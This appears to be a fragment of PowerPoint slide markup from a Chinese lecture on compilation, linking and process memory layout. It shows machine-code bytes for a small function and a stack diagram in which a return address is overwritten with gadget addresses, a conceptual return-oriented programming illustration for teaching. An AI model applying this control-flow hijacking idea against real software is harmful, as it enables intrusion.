            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB1B5CA-FB55-4D09-B1BA-24B7D423A926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8068305" y="2801976"/>
            <a:ext cx="2861362" cy="1676077"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sum:</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x55</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x89 0xe5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x8b 0x45 0x0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x03 0x45 0x08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x5d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0xc3</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Shape 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA7EC1F-EDA0-42B3-9853-FEC56994CB6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7328078" y="3640015"/>
            <a:ext cx="740227" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D44FFC-1C62-46F9-B4D6-A27301FF655E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3788367" y="3270682"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编译</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1425BF80-ADC1-427F-88F8-0CA6C2DBA40A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7375026" y="3270682"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>汇编</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87B1B5B-680F-4CD7-9FDB-067A58F33529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700336" y="2311734"/>
            <a:ext cx="1250663"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语言代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B1FB94A-3449-48EE-9A65-7C197BEFA80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343399" y="2311734"/>
            <a:ext cx="1107996"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汇编代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA4EC2B-5DE8-4CDB-9668-972EE44380FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9060404" y="2311734"/>
            <a:ext cx="87716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机器码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6D9012-0DE0-4CBE-80CE-346D7414356C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4561114"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的编译与链接</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535707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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6649319" y="581081"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>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rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>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8" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="396313"/>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Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="2093056"/>
                <a:ext cx="1363200" cy="325549"/>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dirty="0" err="1"/>
                  <a:t>Libc</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2418605"/>
                <a:ext cx="1363200" cy="475492"/>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 name="Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>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Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274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a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>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4" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>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Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1605876"/>
              <a:ext cx="5738969" cy="490143"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>gadget_addr</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10888324" y="1295909"/>
            <a:ext cx="858835"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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6649322" y="1538342"/>
            <a:ext cx="5" cy="4450368"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649325" y="4517002"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649321" y="5415762"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649320" y="5678933"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
